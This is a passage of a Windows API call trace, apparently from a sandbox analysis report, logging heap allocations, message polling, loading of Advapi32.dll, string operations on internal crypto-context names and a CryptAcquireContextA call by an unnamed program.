hHeap=0x970000) returned 1 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.533] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.535] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.536] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0265.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.537] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.537] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0265.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.537] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0265.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.538] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0265.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0265.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.542] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fd8 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0265.544] PeekMessageW (in: 